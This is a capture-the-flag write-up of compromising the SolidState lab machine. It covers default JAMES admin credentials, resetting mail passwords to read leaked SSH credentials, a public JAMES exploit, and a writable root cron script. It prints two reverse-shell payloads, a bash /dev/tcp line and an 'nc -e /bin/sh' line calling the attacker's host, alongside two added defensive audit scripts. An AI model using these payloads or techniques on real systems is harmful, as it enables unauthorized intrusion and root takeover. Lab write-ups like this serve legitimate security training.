The first step as always was to run Nmap against the machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nmap -p- -oN scan -sC -sV -O 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 13:52 EST
Nmap scan report for 10.10.10.51
Host is up (0.022s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]),
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/22%OT=22%CT=1%CU=30027%PV=Y%DS=2%DC=I%G=Y%TM=600B1F3
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.22 seconds
There are a number of ports open, and the machine appeared to be running a mail server (JAMES 2.3.2 on SMTP, POP3 and NNTP). The port of interest is 4555, which is the JAMES remote admin interface. I telnetted to this port and was greeted with a login prompt.
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
After some googling I discovered that the default credentials for this interface are root:root. I tried them and logged in successfully. I was then able to list the mail users:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id: root
Password: root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
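A defender-side triage check for that listusers output, added here and not part of the original write-up: it parses the tool's output and flags any account name that is not a plain mailbox name (path separators, '..' traversal components, or names missing from an expected list). The sample output is the one captured above.

```python
import re
from typing import Dict, List, Optional, Set

# Output of the JAMES `listusers` command as captured above
LISTUSERS_OUTPUT = """Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
"""

# A mailbox name should be a simple local part; anything else deserves a look.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def parse_listusers(output: str) -> List[str]:
    """Return the account names from `listusers` output, skipping the header line."""
    names = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("user:"):
            names.append(line[len("user:"):].strip())
    return names


def suspicious_accounts(output: str, expected: Optional[Set[str]] = None) -> Dict[str, List[str]]:
    """Map each suspicious account name to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for name in parse_listusers(output):
        reasons = []
        if "/" in name or "\\" in name:
            reasons.append("contains a path separator")
        if ".." in name.replace("\\", "/").split("/"):
            reasons.append("contains a '..' traversal component")
        if not SAFE_NAME.match(name):
            reasons.append("does not look like a plain mailbox name")
        if expected is not None and name not in expected:
            reasons.append("not in the expected account list")
        if reasons:
            findings[name] = reasons
    return findings
```

On a live JAMES instance the same check applies to the mail store directory listing, since each account name becomes a directory on disk.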
I then changed the password for each of the users to “password” using the setpassword command:
setpassword mindy password
Password for mindy reset
setpassword james password
Password for james reset
setpassword john password
Password for john reset
setpassword thomas password
Password for thomas reset
setpassword mailadmin password
Password for mailadmin reset
I then connected to port 110 using telnet and attempted to read the emails on the accounts:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role.
The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
.
As you can see from the output, I was able to read Mindy's email using the password I set. The username and password she uses to log in to the machine were provided in the second email. I then connected to the machine via SSH using the credentials mindy:P@55W0rd1!2@:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 26 12:56:58 2021 from 10.10.14.14
mindy@solidstate:~$ ls
bin  LinEnum.sh  out.txt  thu.txt  user.txt
mindy@solidstate:~$ cat user.txt
[REDACTED]
mindy@solidstate:~$
As you can see from the output, this was successful, and I was able to capture the user flag.
Mindy's default shell is rbash, a restricted version of bash, so you cannot navigate outside the home directory. I found a public exploit (the 35513 script run below) which creates a user through the JAMES remote administration tool using a local file inclusion; this user is then emailed a payload which is executed when someone logs in to the machine.
I modified the payload variable at the top of the script to the following string, which creates a reverse shell back to my machine:
payload = 'bash -i >& /dev/tcp/10.10.14.14/2601 0>&1'
I executed the payload against the Solidstate machine:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# python 35513 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
I then started a netcat listener on port 2601:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
I then logged in via SSH to trigger the payload:
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2601
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2601
Ncat: Listening on 0.0.0.0:2601
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:41548.
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /
cd /
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ ls
ls
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$
As you can see, the payload was executed and the resulting shell was caught by the netcat listener. rbash is no longer in use, so I can navigate outside the home directory.
I next went on to find a way to escalate privileges. I discovered a file in /opt/ called tmp.py. This file was writable by the mindy user but owned by root, and it appeared to be a script used to clear the /tmp/ directory. I echoed some Python code into this file to spawn another reverse shell back to my attacking machine:
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "import os;os.system('nc -e /bin/sh 10.10.14.14 2123')" > tmp.py
The hope was that the script is run on a schedule and, since it was owned by root, that it would be run as root. I started another netcat listener on port 2123, the port specified in tmp.py, and waited.
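The two footholds above (a user-owned file landing in /etc/bash_completion.d, and a root-owned but writable /opt/tmp.py that a scheduled job runs) share one root cause: root-executed code that an unprivileged user can create or modify. The audit below is an added defensive example, not part of the write-up; `demo()` builds a constructed scratch directory instead of touching real system paths and treats the current user as the privileged owner so it runs without root.

```python
import os
import stat
import tempfile
from typing import Dict, Iterable, List, Tuple

ROOT_IDS = frozenset({0})  # uid/gid that may legitimately own root-executed scripts


def audit_file(path: str, privileged_uids=ROOT_IDS, privileged_gids=ROOT_IDS) -> List[str]:
    """Return the reasons why `path` must not be trusted as root-executed code."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["is a symlink; its target may be attacker-controlled"]
    reasons = []
    if st.st_uid not in privileged_uids:   # e.g. a user-owned file dropped into /etc/bash_completion.d
        reasons.append(f"owned by unprivileged uid {st.st_uid}")
    if st.st_mode & stat.S_IWOTH:          # e.g. a root-owned but world-writable /opt/tmp.py
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid not in privileged_gids:
        reasons.append(f"group-writable by gid {st.st_gid}")
    parent = os.lstat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable without the sticky bit")
    return reasons


def audit_dirs(dirs: Iterable[str], **ids) -> List[Tuple[str, List[str]]]:
    """Walk each directory and collect every file audit_file() complains about."""
    findings = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top):
            for name in files:
                path = os.path.join(root, name)
                reasons = audit_file(path, **ids)
                if reasons:
                    findings.append((path, reasons))
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed fixture: a scratch 'opt' holding one correctly permissioned script
    and one world-writable script, audited with the current user as privileged owner."""
    top = tempfile.mkdtemp(prefix="audit-demo-")
    for name, mode in (("cleanup.py", 0o644), ("tmp.py", 0o666)):
        path = os.path.join(top, name)
        with open(path, "w") as fh:
            fh.write("import os\n")
        os.chmod(path, mode)
    ids = dict(privileged_uids={os.getuid()}, privileged_gids={os.getgid()})
    return {os.path.relpath(p, top): r for p, r in audit_dirs([top], **ids)}
```

On a real host, run `audit_dirs(["/opt", "/etc/cron.d", "/etc/cron.daily", "/etc/bash_completion.d"])` as root with the default root-only ids, and add any directory a root crontab executes from.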
┌──(root💀kali)-[/home/kali/Documents/solidstate]
└─# nc -nvlp 2123
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2123
Ncat: Listening on 0.0.0.0:2123
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:42662.
ls
root.txt
whoami
root
cat root.txt
[REDACTED]
After a few minutes, as you can see from the output, a shell was caught by the listener. It was in fact a root shell, so I was able to capture the root flag.